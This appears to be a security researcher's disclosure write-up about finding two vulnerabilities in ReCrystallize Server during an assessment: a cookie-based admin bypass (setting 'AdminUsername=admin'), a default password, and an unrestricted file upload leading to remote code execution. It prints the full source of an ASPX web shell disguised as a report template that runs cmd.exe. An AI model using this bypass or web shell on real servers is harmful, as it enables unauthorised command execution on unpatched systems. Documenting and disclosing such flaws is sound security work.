From Discovery to Disclosure: ReCrystallize Server Vulnerabilities

TL&DR – While on an assessment, I found an instance of ReCrystallize Server. It had many problems, some of which had to do with insufficient hardening on the client’s side while others were new vulnerabilities I found that when chained together, achieve Remote Code Execution (RCE). These vulnerabilities were disclosed to ReCrystallize Software and MITRE.
Besides the disclosed vulnerabilities, some “features” were also used for malicious purposes. The replication and validation of the findings were done on my own test environment.

TL&DR – While on an assessment, I found an instance of ReCrystallize Server. It had many problems, some of which had to do with insufficient hardening on the client’s side while others were new vulnerabilities I found that when chained together, achieve Remote Code Execution (RCE). These vulnerabilities were disclosed to ReCrystallize Software and MITRE.

Besides the disclosed vulnerabilities, some “features” were also used for malicious purposes. The replication and validation of the findings were done on my own test environment.

This blog post was made public despite that there is no patch available (as far as I am aware of) due to a lack of reply from the vendor after multiple interactions.

Hunting for vulnerabilities

This blog post tells the tale of finding two vulnerabilities in ReCrystallize Server software. It started with a web application assessment that was not special in any way. The application in scope was meant for internal use only and the core application was kind of boring. This changed when the application threw some errors when I tried to print a report. Looking at the error is where the fun began!

The error showed that third-party software was used for printing reports. The third-party software was ‘ReCrystallize Server’ and was a standalone application.

I had never heard of this software before and assumed it had something to do with SAP Crystal Reports. From here, I could follow the road in 2 directions. The one direction was to read the documentation and find known vulnerabilities for this software, and the other direction was to hit the login and see what would happen. My curiosity was triggered, so I just smashed the Log In button.

Credentials like ‘admin/admin’ or ‘admin/password’ did not work, so back to direction number one. Let’s look for known vulnerabilities.

The first hit was a bit misleading as the subject was not about vulnerabilities. Are there any known CVEs perhaps?

It seems that this application is completely secure. As it often happens on assessments, I was short on time. So, let’s skip it right?

In the image above you see a search result referring to an installation guide. Perhaps some juicy information is disclosed in there, so I decided to have a look. This was not a wrong decision!

Ok… My short list with default passwords did not work at first, but surely the password is not really ‘pw’? It actually was.

System Info, Settings, Manage Files…. I can smell it already, an over privileged process probably! The first thing I could think about was uploading a web shell within ‘Manage Files’. Unfortunately, the functionality was not working since there was no license present. Next would be ‘System Info’ to gather some information about the system.

Let’s have a look at what could be important. Based on this information we know that the application runs on the system drive (C:). This is useful to know for command execution payloads or Local File Inclusion (LFI) vulnerabilities. The process is running as ‘NT AUTHORITY\SYSTEM’, which is a local account with the highest privileges. We also now know where ReCrystallize Server is installed and therefore would be able to find out where files are going to be stored. In this example you are also able to see that the server is domain joined (no this is not a client domain as I made an effort to set up a lab environment).

You might remember the ‘Settings’ button being present as an administrator function. A lot of options were present under settings such as configuring database credentials, configuring SMTP server settings, etc. None of them were configured, but I wanted to highlight one setting.

As the admin user, I was able to allow the use of absolute paths. This seemed like an important setting for me, but later in this post you will find out that it really is not. This looks like the start of Local File Inclusion.

The installation manual I mentioned earlier showed this:

Apparently, the application can view the contents of a folder specified in the ‘folderName’ parameter. Since I allowed absolute paths, let’s see the functionality in action.

Sweet, I can see the contents of ‘C:\Program Files (x86)’. I just wished there was a way to get the files instead of folders. While playing around with the application and crawling through the manual, I was able to download files from the server.

I exploited this a bit to get access to network shares, extract information regarding the associated Active Directory environment and got database credentials.

Although I was not able to upload a web shell, I was happy with it and ready to notify the client. As if it was written in the almighty guidelines of system administrators, the reaction was:

“You were only able to do that because we did not configure it. After hardening the configuration, this would not be possible anymore”

Hmm, challenge accepted then. The next morning, I was able to retest the findings on the ‘hardened’ configuration of ReCrystallize Server.

For the ones that watched Top Gear with James May, “Bollocks”! The default password was of course changed, the use of absolute paths was disabled. This shouldn’t be happening!

CVE-2024-26331
Luckily, I took a note of some strange behaviour before the client reconfigured the ReCrystallize Server. On some occasions, the session of the core application expired but I was able to continue in the third-party software ReCrystallize Server. I also noted a cookie being set only for ReCrystallize Server, namely ‘AdminUsername=admin’.

Nice, I have administrative access again!

CVE-2024-28269
With a license now present, it was possible to use the ‘Manage Files’ feature. This happened to be a way to upload files without restrictions. Unrestricted File Upload? Let’s get RCE!

Uploading a default ASPX web shell would probably raise an alert. We could do obfuscation and all other kinds of tricks. Instead, I wanted to keep things simple when I searched for an appropriate web shell on the Internet. I created 2 files, report.aspx and report.aspx.cs, where accessing report.aspx would execute the code in Report.aspx.cs. In this case I simply executed the systeminfo command.

Content of report.aspx:

<%@ Page Language="C#" AutoEventWireup="true" CodeFile="report.aspx.cs" Inherits="Report.Template" %>

<!DOCTYPE html>
<html>
<head>
<title>Report Template</title>
</head>
<body>
<h1>Report Results:</h1>
<pre><asp:Literal runat="server" ID="ReportOutput" EnableViewState="false" /></pre>
</body>
</html>

Content report.aspx.cs:

using System;
using System.Diagnostics;

namespace Report
public partial class Template : System.Web.UI.Page
protected void Page_Load(object sender, EventArgs e)
// Set up process info
var processStartInfo = new ProcessStartInfo
FileName = "cmd.exe",
Arguments = "/c systeminfo", // Replace with your desired target
RedirectStandardOutput = true,
UseShellExecute = false,
CreateNoWindow = true

// Start the process
using (var process = new Process { StartInfo = processStartInfo })
process.Start();
string output = process.StandardOutput.ReadToEnd();
process.WaitForExit();

// Display the output on the web page
ReportOutput.Text = output;

The image below shows the result of calling report.aspx.

This was extremely fun, and the client was happy and amazed with the results. The fact that I only needed to place a specific cookie blew their mind. In agreement with the client, I disclosed the vulnerability to ReCrystallize Software.

[...]

Original source

📄 ReCrystallize%20Server%20Installation%20and%20Administration.pdf